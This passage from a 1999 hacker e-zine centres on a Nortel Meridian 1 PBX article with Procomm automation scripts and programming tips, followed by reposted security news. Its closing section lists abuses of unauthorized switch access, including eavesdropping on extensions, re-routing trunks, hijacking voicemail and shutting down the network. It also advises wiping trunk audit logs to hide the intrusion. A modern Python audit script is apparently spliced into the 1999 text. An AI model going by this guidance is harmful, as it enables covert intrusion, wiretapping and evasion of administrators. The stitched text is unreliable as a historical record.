     ; ProComm script by Chris Fourroux & Curt Kempf/City of Columbia - tested
     ; with ProComm Plus 32 95/NT, version 4. Script to capture ACD reports to
     ; disk with the format XXXXXX.txt, where XXXXXX is month day year. Script
     ; waits for "ACD DN 7380" to occur, which is on every hourly report, then
     ; closes and appends the newest statistics to MMDDYY.TXT file.

     string cmd="ncopy c:\capture\"
     string szFileName = $DATE
     string szDate = $DATE
     integer Pos = 0

     proc main
        dial data "Option 61"
        set capture overwrite OFF         ; if capture file exists, append data to it.
        capture off                       ; close capture file if it is open
        when TARGET 0 "ACD DN 7380" call CLOSECAP

     Startloop:
        clear                             ; clear contents of screen and scroll back buffer
        szFileName = $DATE
        szDate = $DATE
        while 1
           if nullstr szFileName          ; Check to see if we've reached
              exitwhile                   ; the end of source string
           endif                          ; and if so, exit loop.
           if strfind szFileName "/" Pos  ; Check for char
              strdelete szFileName Pos 1  ; and delete it
           else
              exitwhile                   ; exit if no more characters
           endif
        endwhile
        strcat szFileName ".txt"
        set capture file szFileName       ; Set name of capture file.
        capture on                        ; Open up the capture file.
        while strcmp $DATE szDate         ; Loop while date is the same
        endwhile                          ; or if the date changes,
        capture off                       ; Close the capture file.
        goto Startloop                    ; and start a new one.
     endproc

     proc closecap
        pause 3
        strcat cmd szFileName             ; Append to variable "CMD"
        strcat cmd " h:\uab\"             ; Append network drive to "CMD"
        transmit "^M***********^M"        ; Put in asterisks between hourly reports
        capture off                       ; Close capture file
        pause 5
        DOS cmd HIDDEN i0                 ; Run "CMD" in DOS and copy file to the LAN
        pause 10
        taskexit i0                       ; Exit DOS window
        pause 10
        cmd="ncopy c:\capture\"           ; Reset "CMD"
        capture on                        ; Turn Capture back on.
     Endproc

Procomm Screen of dialing up the host MCA card (direct connect 9600 baud)
=====================================

     ENTER NUMBER OR H (FOR HELP): 2206
     CALLING 2206
     RINGING
     ANSWERED
     CALL CONNECTED. SESSION STARTS
     logi
     PASS?
     TTY #02 LOGGED IN 08:59 11/4/1999
     >

TN PRT out of Host MCA card

     DES 2206
     TN 020 0 04 31       ;note TN is TN of voice set (20 0 4 15) + (plus) 16
     TYPE 2616
     CDEN 8D
     CUST 0
     AOM 0
     FDN
     TGAR 1
     LDN NO
     NCOS 2
     SGRP 0
     RNPG 0
     SCI 0
     SSU
     XLST
     SCPW
     CLS CTD FBD WTD LPR MTD FND HTD ADD HFD MWD AAD IMD XHD IRD NID OLD DTA DRG1
         POD DSX VMD CMSD CCSD SWD LND CNDD CFTD SFD DDV CNID CDCA ICDD CDMD MCTD
         CLBD AUTU GPUD DPUD DNDD CFXD ARHD FITD CLTD ASCD CPFA CPTA ABDD CFHD FICD
         NAID DDGA NAMA USRD ULAD RTDD PGND OCBD FLXD FTTU
     TOV 0 MINS
     DTAO MCA PSEL DMDM
     HUNT
     PSDS NO
     TRAN ASYN
     PAR SPACE
     DTR OFF
     DUP FULL
     HOT OFF
     AUT ON
     BAUD 9600
     DCD ON
     PRM HOST ON
     VLL OFF
     MOD YES
     INT OFF
     CLK OFF
     KBD ON
     RTS ON
     PLEV 02
     AST
     IAPG 0
     AACS NO
     ITNA NO
     DGRP
     DNDR 0
     KEY 00 SCR 2206 0 MARP
         01 02 03 04 05 06 07 08 09 10 11 12 13 14 15
     DATE 30 DEC 1997

Very rarely, I can not dial up the host MCA card.
It simply won't answer, so the following usually clears it up:

     ITEM
     ITEM OPE YES
     DCD ON
     PRM OFF

If that doesn't work, since 020 0 04 31 is "digital", it could be disabled. LD 32 and ENLU it.

Procomm Script to CHG a TN when it becomes IDLE
===============================================

     string TN              ;TN
     string TIPE            ;TYPE, however word is reserved in ASPECT
     string EYETEM          ;ITEM, ditto above.
     string szList          ;List of items.
     string szItem          ;Item selected from list.
     integer Event          ;Dialog box event.
     integer Num            ;integer value

     proc MAIN
        set txpace 50                                ;delay for keyboard
        when TARGET 0 "IDLE" call CHGIT              ;when receive IDLE, go change set.

        ;Input the TN, TYPE, and ITEM
        sdlginput "LD 11, CHG when IDLE :-)" "Enter TN: " TN
        if strcmp TN ""                              ; compare to see if NULL?
           halt                                      ;if enter is pressed, halt script.
        else
        endif

        ; Display dialog box with list of items.
        ; Pick if set is a 500, 2008, or 2616
        szList = "2616,2008,500"
        dialogbox 0 55 96 100 74 11 "LD 11, CHG when IDLE :-)"
           listbox 1 5 5 90 40 szList single szItem
           pushbutton 2 28 52 40 14 "&Exit" ok default
        enddialog
        while 1
           dlgevent 0 Event                          ; Get the dialog event.
           switch Event                              ; Evaluate the event.
              case 0                                 ; No event occurred.
              endcase
              case 1
                 if strcmp szItem "2616"
                    tipe = "2616"
                 else
                    if strcmp szItem "2008"
                       tipe = "2008"
                    else
                       if strcmp szItem "500"
                          tipe = "500"
                       endif
                    endif
                 endif
              endcase
              default                                ; Exit case chosen.
                 exitwhile
              endcase
           endswitch
        endwhile
        dlgdestroy 0 CANCEL                          ; Destroy the dialog box.

        sdlginput "LD 11, CHG when IDLE :-)" "ITEM: (IE: CLS HTA)" EYETEM
        Transmit "LD 11^M"                           ;Go in to overlay 11
        Waitfor "REQ"
        for Num = 0 upto 100                         ;Keep STAT'n til IDLE
           Transmit "STAT "
           Transmit TN
           Transmit "^M"
           pause 10                                  ; wait 10 seconds
        endfor
     endproc

     PROC CHGIT
        Transmit "CHG^M"                             ;Go change the set, then halt the script.
Waitfor "TYPE" Transmit TIPE pause 1 ;pause 1 second Transmit "^M" Waitfor "TN" Transmit TN Transmit "^M" Waitfor "ECHG" Transmit "YES^M" Waitfor "ITEM" Transmit EYETEM Transmit "^M" waitfor "ITEM" transmit "^M" Waitfor "REQ:" Transmit "END^M" halt endproc Procomm Script to CHG/NEW a list of DNs and their NAMES (LD 95) =============================================================== integer flag=0 ;set flag proc main set txpace 100 ;delay for keyboard when TARGET 1 "SCH2115" call LD95NEW ;wait for 'name does not exit' error ;open text file that has a list of ;DNs & NAMEs you want to change/add. fopen 1 "C:\phone\chgnames.txt" READ ;chgnames.txt it in the format of ; 7354, Jane Doe ; 6745, John Smith ; 7645, Dan White ;script doesn't care if the NAME is NEW or CHG J if failure usermsg "could not open the file." else Transmit "LD 95^M" ;Go in to overlay 95 Waitfor "REQ" Transmit "CHG^M" Waitfor "TYPE" Transmit "NAME^M" Waitfor "CUST" Transmit "0^M" Waitfor "DIG" Transmit "^M" fseek 1 0 0 while 1 fgets 1 s0 if FEOF 1 exitwhile endif strtok s1 s0 "," 1 strtok s2 s0 "," 1 DelStr (&s1) DelStr (&s2) DelLineFeed (&s2) ;strfmt s4 "TN: %s" s1 ;uncomment these two for ;usermsg s4 ;troubleshooting the script strlen s1 i0 if (i0 > 2) LD95CHG () else Transmit "****^M" halt endif endwhile endif endproc proc LD95CHG Waitfor "DN" Transmit s1 Transmit "^M" pause 1 if FLAG==1 FLAG=0 Transmit "^M" return else Transmit s2 Transmit "^M" Waitfor "DISPLAY_FMT" endif endproc proc LD95NEW FLAG=1 Transmit "^M" Transmit "**^M" Waitfor "REQ" Transmit "NEW^M" Waitfor "TYPE" Transmit "NAME^M" Waitfor "CUST" Transmit "0^M" Waitfor "DIG" Transmit "^M" Waitfor "DN" Transmit s1 Transmit "^M" Waitfor "NAME" Transmit s2 Transmit "^M" Waitfor "DISPLAY_FMT" Transmit "^M" Waitfor "DN" Transmit "^M" Waitfor "REQ" Transmit "CHG^M" Waitfor "TYPE" Transmit "NAME^M" Waitfor "CUST" Transmit "0^M" Waitfor "DIG" endproc proc DelStr param string szStr integer Pos while 1 if StrFind szStr "`"" Pos StrDelete szStr 
Pos 1 else exitwhile endif endwhile endproc PROC DelLineFeed param string szStr integer Pos strlen szStr Pos if (Pos > 2) StrDelete szStr (Pos-1) 1 endif endproc You could very easily modify this script to say, change an ASCII list of TNs /TYPEs to TGAR 1, and have it executed at 2:00 a.m. The s0 and s1 variables would change from DN & NAME, to TN & TYPE, and add Waituntil "2:00:00" "7/16 /99" to kick it off at 2:00 a.m. Procomm Script to monitor PBX for "DTA0021", "INI0", "PWR01", then send an alph numeric page when received. ======================================================================= proc Main #DEFINE pagernum "235.5334" ;Enter your pager number here. string szName="OPT61.cap" ;Name of text file to capture to. string passw when TARGET 1 "DTA021" call DTA021 ;what do you want to 'wait for' ? when TARGET 2 "INI0" call INI0 when TARGET 3 "PWR01" call PWR0 set capture file szName capture on set txpace 150 ;delay for keyboard HANGUP Dial DATA "MCA" transmit "^M" waitfor "HELP):" transmit "2206^M" waitfor "SESSION STARTS" while $CARRIER transmit "****" pause 1 transmit "LOGI^M" waitfor "PASS?" sdlginput "Security" "Password: (all caps!)" passw MASKED if stricmp passw "sss" ;to bypass logging in. transmit "*" call loggedin endif transmit passw transmit "^M" pause 2 endwhile set txpace 1 endproc proc DTA021 pageA() ;dial paging provider TRANSMIT "Digital Trunk Diagnostic. Frame alignment persisted for 3 seconds^M" ;send specific x11 error to pager pageB() ;end connection to provider mcacard() ;connect back to Option 61 endproc proc INI0 pageA() TRANSMIT "An initialization has taken place.^M" pageB() mcacard() endproc proc PWR0 pageA() TRANSMIT "Power failure from power and system monitor.^M" pageB() mcacard() endproc proc mcacard HANGUP PAUSE 2 Dial DATA "MCA" ;Connect up to option 61 through MCA card. 
while $DIALING endwhile transmit "^M" pause 1 transmit "^M" waitfor "HELP):" transmit "2206^M" waitfor "SESSION STARTS" pause 1 when RESUME call loggedin loggedin() endproc proc loggedin while $CARRIER ;wait for errors to occur. Continue to do your MACs etc.. endwhile endproc proc pageA when SUSPEND set port dropdtr on pause 1 hangup ;hangup Option 61 connection pause 2 hangup ;release mca card from COM port set port dropdtr off pause 1 Dial DATA "TriStar" ;Dial your paging provider while $DIALING endwhile TRANSMIT "^M" ;TAPI protocol, M puts in manual mode. WAITFOR "ID=" TRANSMIT "M^M" WAITFOR "Enter pager" TRANSMIT pagernum TRANSMIT "^M" WAITFOR "Enter alpha" endproc proc pageB TRANSMIT "^M" WAITFOR "More Pag" TRANSMIT "^M" pause 2 endproc Little Known Meridian 1 Features And Programming Tricks ======================================================= HELP and Error Lookup HELP - Type " ? " at many prompts LOOKUP - At " > " sign, type ERR AUD028 to find out what AUD028 indicates. At any other prompt, type " ! ", then you will receive " > " symbol for getting ERR lookup. Find Sets with a Certain Feature ================================ LD81 REQ LST FEAT CFXA FEAT UNR Lists all sets that have the "Call Forward External Allow" feature, then lists all UNR sets. Inventory and Identification Commands ===================================== LD32 IDU l s c u (or) IDC l s c LD22 CINV (and) ISSP LD30 UNTT l s c u Speed Call Stuff ================ Create many Speed Call lists at once. LD18 REQ: NEW 100 - Creates 100 lists. When memory is plentiful, make Speed Call list number the same as the persons DN. Need to increase MSCL in LD17 Find a "Controller" in LD81 by: REQ:LST, FEAT:SCC, then the Speed List Number Allow Restricted Sets to Dial Certain Long Distance Numbers. ============================================================ Add the numbers to a System Speed Call List. Assign an NCOS to the "List" that replaces the users NCOS during the call. 
Alternate: Add the suffix of the telephone number to an ARRN list in the
prefix's RLI.  This will point only that number to a new RLI with a lower
(or higher if you choose) FRL.  Look up ARRN in LD86.

PBX Clock Fast or Slow?
=======================
LD2  SDTA X Y  -- x y
     X = 0 for "subtract time each day" -or- 1 for "add time each day"
     Y = 0-60 seconds to be added or subtracted each day.
Daylight Savings Question?  TDST - Look this one up in LD2 before changing.

Phantom DNs, TNs, and "MARP to Voice Mail" TNs
==============================================
Phantom TN with FTR DCFW
ACD Queues with NCFW but no Agents
2616 Sets with AOMs (AOMs can be in "software", but do not need to be
"installed" on the set).  This is an excellent "MARP TN" for DNs that need
to HUNT/FDN to Voice Mail.

Digit Display on Trunk Routes and ACD Queues
============================================
Find Trunk Route Access Codes - name in LD95 like any other DN
ACD Numbers - name in LD95 like any other DN
IDC Numbers - name in LD95 at DCNO prompt.
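The alarm-watching script above keys on the strings DTA021, INI0 and PWR01 in the TTY stream, the session log shows what a maintenance-port login looks like ("TTY #02 LOGGED IN 08:59 11/4/1999"), and the LD81 tip lists sets by feature (CFXA, UNR). The block below is an added example, not code from the original text file, written in Python rather than Procomm ASPECT: it audits a saved capture file offline and pulls out those alarm codes, the login records that show who was on the maintenance port and when, and any TN PRT block whose CLS carries CFXA or UNR. The sample capture is constructed for the example; its layout (prompt keyword in column 0, wrapped CLS values indented) follows the TN PRT shown earlier, and the alarm and second-set lines are invented.

```python
"""Audit a saved Meridian 1 maintenance-TTY capture file (added example, not
from the original text file; Python rather than Procomm ASPECT).  Reports the
alarm codes the paging script keys off, maintenance-port login records, and
TN PRT blocks whose CLS carries a feature the LD81 tip lists."""
import re
from dataclasses import dataclass, field

ALARM_CODES = ("DTA021", "INI0", "PWR01")   # targets of the paging script
FLAGGED_CLS = ("CFXA", "UNR")                # features the LD81 tip lists
LOGIN_RE = re.compile(r"TTY #(\d+) LOGGED IN (\d\d:\d\d) (\d{1,2}/\d{1,2}/\d{4})")

# Constructed sample capture: a login record, two TN PRT blocks, two alarms.
SAMPLE_CAPTURE = """\
TTY #02 LOGGED IN 08:59 11/4/1999
DES  2206
TN   020 0 04 31
TYPE 2616
TGAR 1
CLS  CTD FBD WTD LPR MTD FND HTD ADD HFD MWD AAD IMD XHD IRD NID OLD DTA DRG1
     CLBD AUTU GPUD DPUD DNDD CFXD ARHD FITD CLTD ASCD CPFA CPTA ABDD CFHD FICD
KEY  00 SCR 2206 0   MARP
     01
DATE 30 DEC 1997

DES  LOBBY
TN   020 0 05 02
TYPE 2008
TGAR 0
CLS  UNR CFXA WTA
DATE 30 DEC 1997

DTA021 10 0 0 1
TTY #03 LOGGED IN 02:13 11/5/1999
INI000
"""

@dataclass
class TnBlock:
    des: str = ""
    tn: str = ""
    set_type: str = ""
    tgar: str = ""
    cls: list = field(default_factory=list)

    def flagged_cls(self) -> list:
        return [c for c in self.cls if c in FLAGGED_CLS]

def parse_tn_blocks(lines: list) -> list:
    """Split TN PRT output into blocks running from DES to DATE.
    Prompt responses start in column 0; wrapped CLS values are indented."""
    blocks, cur, in_cls = [], None, False
    for raw in lines:
        parts = raw.split()
        if not parts:
            continue
        if raw[0].isspace():                 # continuation of a wrapped CLS
            if cur is not None and in_cls:
                cur.cls.extend(parts)
            continue
        key, rest = parts[0], parts[1:]
        in_cls = False
        if key == "DES":
            cur = TnBlock(des=" ".join(rest))
            blocks.append(cur)
        elif cur is None:
            continue                         # text outside any block
        elif key == "TN":
            cur.tn = " ".join(rest[:4])      # l s c u; drop trailing notes
        elif key == "TYPE":
            cur.set_type = rest[0] if rest else ""
        elif key == "TGAR":
            cur.tgar = rest[0] if rest else ""
        elif key == "CLS":
            cur.cls.extend(rest)
            in_cls = True
        elif key == "DATE":
            cur = None                       # DATE closes the block
    return blocks

def find_alarms(lines: list) -> list:
    """(line number, code) per alarm, substring-matched like 'when target'."""
    return [(n, code) for n, line in enumerate(lines, 1)
            for code in ALARM_CODES if code in line]

def find_logins(lines: list) -> list:
    """(tty, time, date) for each maintenance-port login record."""
    hits = []
    for line in lines:
        m = LOGIN_RE.search(line)
        if m:
            hits.append(m.groups())
    return hits

def audit_capture(text: str) -> dict:
    lines = text.splitlines()
    flagged = [(b.tn, b.set_type, b.flagged_cls())
               for b in parse_tn_blocks(lines) if b.flagged_cls()]
    return {"alarms": find_alarms(lines), "logins": find_logins(lines),
            "flagged": flagged}

if __name__ == "__main__":
    for section, rows in audit_capture(SAMPLE_CAPTURE).items():
        print(section, rows)
```

Substring matching is deliberate: ASPECT's `when target` fires on any line containing the string, so INI0 also catches longer INI codes, and the audit mirrors that. Run against a real capture by replacing SAMPLE_CAPTURE with the file's contents; the login list is the part worth keeping, since it is the only record of who used the maintenance port.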
Limited Access Passwords
========================
Print PWD in LD22 before starting
LD17  LAPW 01
      PW01 12345
      OVLA 10 11 20

Identify Trunks, Routes and TTY Ports with "DES" Entry
======================================================
LD17  ADAN  DES can be 1-16 characters
LD16  RDB   DES can be 1-16 characters
LD14  TRK   DES can be 1-16 characters
      TKID - enter telephone number

Free Up or Block DN Range
=========================
Change your SPRE Code to 4 digits
LD15 - SPRE XXXX
Assign all current feature codes as Flexible Feature Codes
To hide DNs from appearing in LUDN printouts, enter DN prefix ranges as an
FFC for "Ring Again Activate"

Save "Call Forward" Status upon Reload/Sysload
==============================================
LD17  CFWS YES

Call Waiting "Buzz" on Digital Sets is Not Long Enough
======================================================
Turn on Flexible Incoming Tones Allowed
LD15  OPT SBA DBA
LD11  CLS FITA

"DSP" Display Key Applications
==============================
You're on the phone, another call comes in... Press DSP, then the ringing
line to see who's calling.
Press DSP, then Speed Call, then entry number to view entries.
Rls23 Update - automatic Display  CLS TDD

NHC - No Hold Conference
========================
With NHC, the other party is not placed on hold while adding conferees.  You
can also disconnect a conferee called with NHC.
LD11  KEY X NHC
Rls23 Update - Conf. Display/Disconnect  LD11 CLS CDCA

Call Forward Indication on 2500 Sets
====================================
Add Call Forward Reminder Tone.  Special dial tone is heard only when call
forwarded.
LD15  OPT CFRA

Override Call Forwarded Phone
=============================
Add Flexible Feature Code for "CFHO".  Dial CFHO code, then dial extension.
LD57  CODE CFHO
On sets needing ability to perform override:  CLS CFHA

Call Forward ONLY Internal Calls - Let Externals Ring
=====================================================
Great when you need to prioritize external callers.
LD11  KEY X ICF 4 ZZZZ

"Delayed" Ring on Multiple Appearance DNs
=========================================
Non-ringing (SCN) keys will ring after a certain duration.  Great for areas
where many of the same DNs appear.
LD11  DNDR X   (X = 0-120 seconds of delay before SCN keys will start to ring)

Audible Reminder of Held Calls
==============================
Receive "buzz tone" every X seconds to remind the user that a call is on
hold.  Also reminds the user that a Conference/Transfer was mishandled -
the call was never transferred.
LD15  DBRC X   (X = 2-120 seconds between reminders)
LD11  CLS ARHA

Which Call "On Hold" is Mine
============================
Exclusive Hold sets held calls to "wink" at the holding set, but stay
"steady" at other sets.
LD10/11  CLS XHA

Change Ring Cadence/Tone
========================
There are 4 ring styles, adjusted in the CLS of the digital set.
LD11  CLS: DRG1 -or- DRG2 -or- DRG3 -or- DRG4
Set pesky customer phones to DRG4 !

BFS - Nightmare in Shining Armor ?
==================================
BFS Keys allow the user to monitor the Call Forward and busy status of a
set, activate and deactivate Call Forward, and can be used as an Autodial
key.  NOTE: Cannot perform MOV command with BFS.  The user can also forward
sets by accident.
LD11  Key XX BFS l s c u   (target set's TN)

More Than 4 DNs Answered by One Mailbox?
========================================
Add up to 3 DNs to the DN list in mailbox programming.  Add the 4th and all
additional DNs in the "Voice Service DN" (VSID) Table and set to "EM" to the
mailbox.

1 Single Line Telephone, 3 DNs, 3 Users, 3 Mailboxes?  How?
===========================================================
Create one 2500 set with one of the three DNs.  Create 2 Phantom TNs, each
one with a new DN, and DCFW each of them to the 2500 set's DN (from above).
Add the three mailboxes... now any of the three numbers will ring the one
set, but messages will be separated!
Change An NCOS After Hours
==========================
Here's an excerpt from the LD86 ESN data block that has NCOS 3 & 4 change to
NCOS 2 after 4:30PM and all day on weekends.
AC1  9
AC2
DLTN YES
ERWT YES
ERDT 0
TODS 0 06 00 16 29
     7 00 00 05 59
     7 16 30 23 59
RTCL YES
NCOS 0 - 0
NCOS 1 - 1
NCOS 2 - 2
NCOS 3 - 2
NCOS 4 - 2
NCOS 5 - 5

Oops.. the Console Went Into NITE... During the DAY!
====================================================
Use NITE entries that are based on "Time of Day".  See Night Service in the
Features Book.  If the console goes into NITE during the day, send them to
either a set of DNs next to the console, or a voice menu/thru-dialer
explaining that there are "technical difficulties".  After hours, NITE
calls go to where they should.

Just Two Security Tricks
========================
Create SPNs in BARS of 000 thru 009 and create a Route List Block for them
with LTER=YES.  Now when Phreakers ask for extn 9000, they get nobody.
Use the FLEN entry on SPNs 0, 00, 011 so that nobody can transfer a caller
to 9011, 90, etc.

Break Into Meridian Mailbox?
============================
Simply make the mailbox "Auto-logon".  For remote access, add their DN to
your set.  Convenient if you need to access an employee's mailbox without
changing their password.  Useful for modifying greetings of an absent
employee or allowing a temporary employee access to a mailbox without
divulging the regular employee's password.

Tracing Phone Calls
===================
TRAC 0 XXXX       (X=extension)
TRAC l s c u
TRAC l s c u DEV  (Adds BARS info)
TRAT 0 X          (X=Console number)
TRAD              (see book, traces T1 channels)
ENTC              (see book, traces TN continuously - up to 3 TNs at a time !)

Forgot your M3000 Directory Password?
=====================================
LD32  CPWD l s c u

Another Idea
============
Use a PC to log into your PBX, then activate the "capture file".  Now run a
TNB and keep it as a file rather than on paper.  If your TNB file is large,
try a high power text editor, which can open even 20meg files in seconds.
Search the Internet for "Text Editor".  Keep copies so you can go back and
see how a set was programmed when you OUT it by mistake.

*/

Using the above information you could successfully do the following:

a) Set up your own trunk configurations that allow outgoing calls.
b) Reset lines and trunks, reconfigure lines and trunks.
c) Set an internal extension(s) to share the same multiplexed trunk as you
   so you can effectively listen in on any incoming/outgoing phone call made
   on that extension.
d) Set up calls that don't exist with no trunk assignment.
e) Set any user's voicemail box with auto-logon parameters temporarily.
f) Close down the entire network.
g) Set every phone in the company to ring forever...
h) Re-route incoming/outgoing trunk calls to any destination.
i) Park your own incoming line as "on console" so you can answer calls made
   to a pre-set extension.
j) Make yourself the company operator.
k) Trace phone calls, audit logs etc.
l) Set all trunks to loopback on one another.
m) Anything you want?

That's just a few ideas.  But before you do ANYTHING, you should be aware
that anything you do could have a devastating impact on the company's phone
switch.  For example, say you accidentally commanded the system to shut
down.. You would effectively be killing 6000+ people's phone lines, which
would yield a colossal financial burden/loss onto the company.  Generally
I'm just saying, be nice.. Just because you have the power to do such
things, it doesn't mean you have to do it. :)

A final note: In the aftermath of obtaining access to a Meridian switch, it
is generally advisable to erase all trace of you ever being on there.  This
can be achieved by resetting trunk audit logs, and erasing any log of your
incoming trunk setups.  Therefore, if the real admin decided to track what
was going on he/she would get nowhere because the lines you used to
initially call into the system DO NOT EXIST.
It's just a case of using your imagination.  Don't be destructive, don't
alter anything that would be noticed, generally don't be a f00l..

That's the end of this file, I hope you enjoyed it.  Take it easy.

Shouts to D4RKCYDE, NOU!, b4b0, 9x, subz, pbxphreak, lusta, gr1p,
LINEMANPUNX.

. .. ... .......... BL4CKM1LK teleph0nics .......... ... .. .
. .. ... .......... http://hybrid.dtmf.org ......... ... .. .

@HWA

31.0 Adobe Fingers EBay Pirates
     ~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by deepquest
     Information from Adobe provided to federal law enforcement officials
     led to the arrest and indictment of two people from West Virginia who
     have allegedly attempted to auction off pirated copies of Adobe
     products online.

     Andover News
     http://www.andovernews.com/cgi-bin/news_story.pl?72306/topstories

     Top Stories

     Adobe Systems Helps Feds Nab EBay Software Pirates
     11/03/99

     SAN JOSE, CALIFORNIA, U.S.A., 1999 NOV 3 (Newsbytes) -- By Sherman
     Fridman, Newsbytes.  Two alleged software pirates are about to walk
     the judicial plank as a result of a Federal indictment that was
     announced today.

     Ralph Gussie Sumlin, Jr. and Elizabeth Jean Sumlin, both of
     Farmington, W.Va., were charged in one-count indictments alleging that
     they willfully infringed on copyrights owned by Adobe Systems Inc.
     [NASDAQ:ADBE].  The indictments said that the copyright violations
     occurred when the Sumlins attempted to auction what is believed to be
     pirated Adobe software on eBay's online auction site.

     In an announcement made by Adobe Systems after the indictments were
     handed out, Batur Oktay, corporate counsel for Adobe, is reported to
     have said, "Based on our investigations, we have found that the vast
     majority of Adobe software sold on these sites is pirated."  He also
     said that, "Adobe will continue its aggressive campaign against
     Internet piracy."
     Adobe Systems reportedly worked in close collaboration with the FBI,
     Postal Inspection Service, and the Fairmont, Calif., police department
     in this case.

     In an ongoing effort to enforce copyright compliance, Adobe has
     partnered with anti-piracy organizations such as The Business Software
     Alliance (BSA) and the Software Publisher's Association (SPA) to
     investigate and sue end-users and resellers of pirated software.

     In addition, Adobe is encouraging consumers to report sellers of
     counterfeit Adobe products, and has established the e-mail address
     piracy@adobe.com for this purpose.

     Reported by Newsbytes.com, http://www.newsbytes.com

     09:29 CST
     Reposted 10:16 CST

@HWA

32.0 India, Syria, Iran Have Offensive Cyberwar Abilities
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by some1
     India, Syria and Iran have been labeled as the most sophisticated
     countries out of twenty-three who are believed to have the capacity to
     engage in state-sponsored electronic warfare.  (Unfortunately this
     article does not mention where this information comes from.)

     Detroit News
     http://detnews.com/1999/technology/9911/03/11030116.htm

     India, Syria, Iran adept at e-raids

     Lisa Hoffman / Scripps Howard News Service

     WASHINGTON -- So far, as many as 23 countries are believed to have the
     capacity to engage in state-sponsored, surreptitious electronic raids.
     Among the most sophisticated: India, Syria and Iran, experts say.

     Some nations already have taken the leap:

     Indonesia: Its government in January was identified as being behind a
     coordinated assault on Ireland's Internet service provider, which
     hosted a Web site advocating independence for the province of East
     Timor.

     Russia: Hackers working for the Russian government targeted Pentagon
     computer networks between January and May, apparently in search of
     naval codes and missile guidance data.  Pentagon officials say the
     attacks failed to penetrate classified systems.
     China: It launched an assault on an array of U.S. government Web sites,
     including those of the departments of Energy and Interior and the
     White House's public site, which was knocked out of commission three
     times.  These occurred after a U.S. bomb accidentally struck the
     Chinese Embassy in Belgrade in May during the conflict with Yugoslavia.

     The assault was triggered by outraged Chinese government operatives,
     apparently letting their emotions get the better of them.  They lobbed
     a fusillade of electrons but, by doing so, also revealed an astonishing
     3,000 to 4,000 "back doors" into U.S. computer systems that had been
     created by China, according to Jay Valentine, head of Infoglide Corp.,
     an Austin, Texas, company that investigates computer security breaches
     for the U.S. government.

     Valentine estimates that number of secret passages amounts to only
     about 5 percent of those China has managed to establish in both
     government and private industry systems.

     Even more sobering is the public discussion now going on within
     China's top military leadership circles about the desirability of
     developing a "dirty war" strategy, in which computer viruses would be
     used against the West.

     Revelations such as these are adding urgency to the Pentagon's efforts
     to fortify its systems against incursions and cobble together a
     war-fighting doctrine to guide its own conduct of cyber combat.
     Defense leaders have designated the U.S. Space Command in Colorado
     Springs, Colo., as the headquarters for both offensive and defensive
     cyber war, although it won't come online until next October.

@HWA

33.0 Singapore Launches Probe Into Defacement
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by McIntyre
     A recent defacement of a government web site in Singapore has caused
     the National Computer Board to launch an investigation.  Singapore
     officials said that they will work closely with their foreign
     counterparts to investigate and track the perpetrators.
     The Straits Times
     http://straitstimes.asia1.com/cyb/cyb1_1102.html

     NOV 2 1999

     Probe into hack at S'pore Govt website

     THE National Computer Board is investigating Sunday's possible hacking
     into the Singapore Government website.

     Asked about the incident yesterday, Minister for Communications and
     Information Yeo Cheow Tong said the incident showed the risk all
     countries face.  He said that adding safeguards may prove to be a
     temporary solution.

     "Each time you come up with some safeguards, we find that somebody else
     will come up with an equally innovative way to bypass our safeguards.

     "It's a continuing process we have to cope with," he said.

     He was speaking to reporters after his keynote address at the trade
     show, Sapphire '99 Singapore.

     In Sunday's incident, the contents of the page were reportedly removed
     and replaced with a message from a hacker.  This was temporary and
     checks showed that the site was back to normal on Sunday itself.

     The hacker is said to be a foreigner and the National Computer Board
     yesterday said that the law here treated foreign hackers no different
     from local ones.

     It said: "Regardless of the nationalities of the alleged hackers, the
     Singapore police will work closely with their foreign counterparts to
     investigate and track the perpetrators."

@HWA

34.0 Military Sites Invaded
     ~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by McIntyre
     hV2k has claimed responsibility for defacing web sites that belonged to
     the Navy, Marines, and other sites.  (Unfortunately this sort of thing
     has become so common it is no longer news.)
     News Bytes
     http://www.newsbytes.com/pubNews/99/138770.html

     Attrition.org - Defacement Mirror
     http://www.attrition.org/mirror

     News Bytes;

     Four US '.mil' Web Sites Invaded By Cracker Group
     By Bob Woods, Newsbytes
     WASHINGTON, DC, U.S.A., 02 Nov 1999, 1:12 PM CST

     A group of hackers - more accurately known as "crackers" - hit at least
     four US military Web sites sometime on Monday, according to a Web site
     that tracks such infiltrations.  As Web site crackings go, though,
     three of the four invasions were relatively benign.

     The group "hV2k" claimed responsibility for the invasions, through text
     left behind at each site, according to copies or "mirrors" of the sites
     stored at Attrition.org.

     HV2k completely replaced the framed main page at the Navy Crane
     Center's (http://ncc.navfac.navy.mil ) Web site with the message, "Hi
     Mr DOD Admin, guess what.. YER SEKURITY SUCKS, oh and hV2k owns you.
     *kiss*"

     The group's infiltration of the AEGIS Training and Readiness Center
     Detachment in Norfolk, Va. (http://www.norfolk.atrc.navy.mil ) and the
     Marine Corps Air Station at Iwakuni, Japan (http://www.iwakuni.usmc.mil )
     were not as bold.  Neither page was greatly altered, save for a line at
     the bottom of each site.  The note at the Marine Corps site said, "Hi
     kids, SLiPY of hV2k here just bitching about NT and how bad it sucks.
     Greets to NukeLear and Bleeding Angel."  And "hi hV2k here" was left by
     the infiltrators at the AEGIS site.  As of 1:40 PM EST today, the
     Iwakuni Web site was down, according to an automatically generated
     prompt at the site.

     HV2k's cracking of the Naval Air Warfare Center Aircraft Division
     (NAWCAD) at Webster Field, Md. (http://www.webster.webfld.navy.mil )
     was much more subtle.  The group inserted the message, "Hi! kiddies, no
     its not santa, its me, SliPY. hV2k" as black text on an otherwise
     undefaced page that has a black background.
     The message can be seen only if the page source is viewed through the
     Web browser, or if the bottom of the page where the text is located is
     highlighted.

     US military forces were not alone in facing hV2k's wrath.  The official
     Web site of Canada's Department of National Defense and the Canadian
     Forces (http://www.dnd.ca ) was also defaced by the group sometime
     Monday.  The group took the minimalist approach with this infiltration,
     simply writing at the bottom of the site's main page, "hi slipy and
     hv2k own."

     HV2k seems to have shifted its focus to military sites from much
     smaller commercial Web pages.  The group claimed responsibility for
     cracking sites like "Bottle Cap Site," "America's Highway" and "Totally
     Dumb" in October, and "Think Tank Online Services" and the Geofluids
